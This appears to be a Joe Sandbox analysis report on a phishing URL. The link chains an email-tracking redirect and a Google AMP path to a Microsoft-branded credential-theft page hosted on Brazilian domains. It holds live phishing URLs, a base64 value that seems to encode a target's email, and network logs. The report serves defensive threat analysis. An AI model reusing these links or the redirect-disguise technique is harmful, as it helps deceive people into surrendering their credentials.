Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://emp.eduyield.com/el?aid=2t26dda0e6c-1865-11ef-80aa-0217a07992df&rid=33766156&pid=771868&cid=497&dest=google.com.////amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%A3%E2%82%AC%E2%80%9A

Overview

General Information

Sample URL:https://emp.eduyield.com/el?aid=2t26dda0e6c-1865-11ef-80aa-0217a07992df&rid=33766156&pid=771868&cid=497&dest=google.com.////amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%
Analysis ID:1501390
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Suricata IDS alerts for network traffic
Phishing site detected (based on image similarity)
Phishing site detected (based on logo match)
Detected suspicious crossdomain redirect

Classification

Process Tree

  • System is w10x64
  • chrome.exe (PID: 344 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5768 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 --field-trial-handle=2200,i,1794559140253772968,16648018370303227466,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6412 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://emp.eduyield.com/el?aid=2t26dda0e6c-1865-11ef-80aa-0217a07992df&rid=33766156&pid=771868&cid=497&dest=google.com.////amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%A3%E2%82%AC%E2%80%9A" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

Timestamp:2024-08-29T20:55:50.535852+0200
SID:2857090
Severity:1
Source Port:443
Destination Port:49747
Protocol:TCP
Classtype:Successful Credential Theft Detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: https://emp.eduyield.com/el?aid=2t26dda0e6c-1865-11ef-80aa-0217a07992df&rid=33766156&pid=771868&cid=497&dest=google.com.////amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%A3%E2%82%AC%E2%80%9ASlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

Phishing

barindex
Phishing site detected (based on image similarity)
Source: https://hdjdsigfhgejw.caririinovacao.com.br/?wi=bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%83%C3%82%C2%A3%C3%83%C2%A2%C3%82%C2%82%C3%82%C2%AC%C3%83%C2%A2%C3%82%C2%80%C3%82%C2%9AMatcher: Found strong image similarity, brand: MICROSOFT
Phishing site detected (based on logo match)
Source: https://hdjdsigfhgejw.caririinovacao.com.br/?wi=bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%83%C3%82%C2%A3%C3%83%C2%A2%C3%82%C2%82%C3%82%C2%AC%C3%83%C2%A2%C3%82%C2%80%C3%82%C2%9AMatcher: Template: microsoft matched
Source: https://hdjdsigfhgejw.caririinovacao.com.br/?wi=bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%83%C3%82%C2%A3%C3%83%C2%A2%C3%82%C2%82%C3%82%C2%AC%C3%83%C2%A2%C3%82%C2%80%C3%82%C2%9AMatcher: Template: microsoft matched
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49744 version: TLS 1.2

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2857090 - Severity 1 - ETPRO PHISHING JS/PsyduckPockeball Payload Inbound : 164.90.176.213:443 -> 192.168.2.4:49747
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: www.google.com to https://canoassuplementos.com.br//////dayo/xljj3/bwzlcmvzqhblby5vbi5jyq==$
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 163.171.128.244
Source: unknownTCP traffic detected without corresponding DNS query: 163.171.128.244
Source: unknownTCP traffic detected without corresponding DNS query: 163.171.128.244
Source: unknownTCP traffic detected without corresponding DNS query: 163.171.128.244
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /el?aid=2t26dda0e6c-1865-11ef-80aa-0217a07992df&rid=33766156&pid=771868&cid=497&dest=google.com.////amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%A3%E2%82%AC%E2%80%9A HTTP/1.1Host: emp.eduyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET ////amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A HTTP/1.1Host: google.com.Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A HTTP/1.1Host: google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A HTTP/1.1Host: www.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET //////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A HTTP/1.1Host: canoassuplementos.com.brConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: canoassuplementos.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9AAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?wi=bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%83%C3%82%C2%A3%C3%83%C2%A2%C3%82%C2%82%C3%82%C2%AC%C3%83%C2%A2%C3%82%C2%80%C3%82%C2%9A HTTP/1.1Host: hdjdsigfhgejw.caririinovacao.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://canoassuplementos.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: emp.eduyield.com
Source: global trafficDNS traffic detected: DNS query: google.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: canoassuplementos.com.br
Source: global trafficDNS traffic detected: DNS query: hdjdsigfhgejw.caririinovacao.com.br
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 18:55:49 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: chromecache_43.2.drString found in binary or memory: https://microsodt-office-office.perfitassi.com.br/?vcES=nVt6Go
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: classification engineClassification label: mal64.phis.win@18/4@14/8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 --field-trial-handle=2200,i,1794559140253772968,16648018370303227466,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://emp.eduyield.com/el?aid=2t26dda0e6c-1865-11ef-80aa-0217a07992df&rid=33766156&pid=771868&cid=497&dest=google.com.////amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%A3%E2%82%AC%E2%80%9A"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 --field-trial-handle=2200,i,1794559140253772968,16648018370303227466,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection		1
Process Injection		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer		Traffic DuplicationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
https://emp.eduyield.com/el?aid=2t26dda0e6c-1865-11ef-80aa-0217a07992df&rid=33766156&pid=771868&cid=497&dest=google.com.////amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%A3%E2%82%AC%E2%80%9A0%Avira URL Cloudsafe
https://emp.eduyield.com/el?aid=2t26dda0e6c-1865-11ef-80aa-0217a07992df&rid=33766156&pid=771868&cid=497&dest=google.com.////amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%A3%E2%82%AC%E2%80%9A100%SlashNextCredential Stealing type: Phishing & Social Engineering

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://microsodt-office-office.perfitassi.com.br/?vcES=nVt6Go0%Avira URL Cloudsafe
https://canoassuplementos.com.br/favicon.ico0%Avira URL Cloudsafe
https://www.google.com/amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A0%Avira URL Cloudsafe
https://google.com/amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A0%Avira URL Cloudsafe
https://google.com.////amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
canoassuplementos.com.br
191.252.144.224
truefalse
    		unknown
    k256-all.gslb.ksyuncdn.com
    		125.39.194.1
    		truefalse
      		unknown
      google.com
      		142.250.181.238
      		truefalse
        		unknown
        hdjdsigfhgejw.caririinovacao.com.br
        		164.90.176.213
        		truetrue
          		unknown
          emp.eduyield.com
          		107.23.245.109
          		truefalse
            		unknown
            www.google.com
            		142.250.185.228
            		truefalse
              		unknown
              fp2e7a.wpc.phicdn.net
              		192.229.221.95
              		truefalse
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://www.google.com/amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9Afalse
                • Avira URL Cloud: safe
                		unknown
                https://canoassuplementos.com.br/favicon.icofalse
                • Avira URL Cloud: safe
                		unknown
                https://canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9Afalse
                  		unknown
                  https://google.com.////amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9Afalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://emp.eduyield.com/el?aid=2t26dda0e6c-1865-11ef-80aa-0217a07992df&rid=33766156&pid=771868&cid=497&dest=google.com.////amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%A3%E2%82%AC%E2%80%9Atrue
                    		unknown
                    https://google.com/amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9Afalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://hdjdsigfhgejw.caririinovacao.com.br/?wi=bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%83%C3%82%C2%A3%C3%83%C2%A2%C3%82%C2%82%C3%82%C2%AC%C3%83%C2%A2%C3%82%C2%80%C3%82%C2%9Atrue
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://microsodt-office-office.perfitassi.com.br/?vcES=nVt6Gochromecache_43.2.drfalse
                      • Avira URL Cloud: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      142.250.185.228
                      		www.google.comUnited States
                      		15169GOOGLEUSfalse
                      107.23.245.109
                      		emp.eduyield.comUnited States
                      		14618AMAZON-AESUSfalse
                      191.252.144.224
                      		canoassuplementos.com.brBrazil
                      		27715LocawebServicosdeInternetSABRfalse
                      142.250.185.110
                      		unknownUnited States
                      		15169GOOGLEUSfalse
                      142.250.181.238
                      		google.comUnited States
                      		15169GOOGLEUSfalse
                      239.255.255.250
                      		unknownReserved
                      		unknownunknownfalse
                      164.90.176.213
                      		hdjdsigfhgejw.caririinovacao.com.brUnited States
                      		14061DIGITALOCEAN-ASNUStrue

                      Private

                      IP
                      192.168.2.4

                      General Information

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1501390
                      Start date and time:2024-08-29 20:54:37 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 3m 17s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:browseurl.jbs
                      Sample URL:https://emp.eduyield.com/el?aid=2t26dda0e6c-1865-11ef-80aa-0217a07992df&rid=33766156&pid=771868&cid=497&dest=google.com.////amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%A3%E2%82%AC%E2%80%9A
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:8
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal64.phis.win@18/4@14/8
                      EGA Information:Failed
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 142.250.185.206, 142.250.186.35, 66.102.1.84, 34.104.35.123, 20.12.23.50, 125.39.194.1, 13.95.31.18, 192.229.221.95, 52.165.164.15, 142.250.185.67
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, clientservices.googleapis.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, ocsp.edge.digicert.com, sls.update.microsoft.com, update.googleapis.com, clients.l.google.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtSetInformationFile calls found.
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • VT rate limit hit for: https://emp.eduyield.com/el?aid=2t26dda0e6c-1865-11ef-80aa-0217a07992df&rid=33766156&pid=771868&cid=497&dest=google.com.////amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%A3%E2%82%AC%E2%80%9A

                      Simulations

                      Behavior and APIs

                      No simulations

                      LLM Input / Output

                      InputOutput
                      URL: https://hdjdsigfhgejw.caririinovacao.com.br/?wi=bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%83%C3%82%C2%A3%C3%83%C2%A2%C3%82%C2%82%C3%82%C2%AC%C3%83%C2%A2%C3%82%C2%80%C3%82%C2%9A Model: jbxai
                      {
"brand":["Microsoft"],
"contains_trigger_text":false,
"prominent_button_name":"play",
"text_input_field_labels":["unknown"],
"pdf_icon_visible":false,
"has_visible_captcha":false,
"has_urgent_text":false,
"has_visible_qrcode":false}

                      Joe Sandbox View / Context

                      IPs

                      No context

                      Domains

                      No context

                      ASNs

                      No context

                      JA3 Fingerprints

                      No context

                      Dropped Files
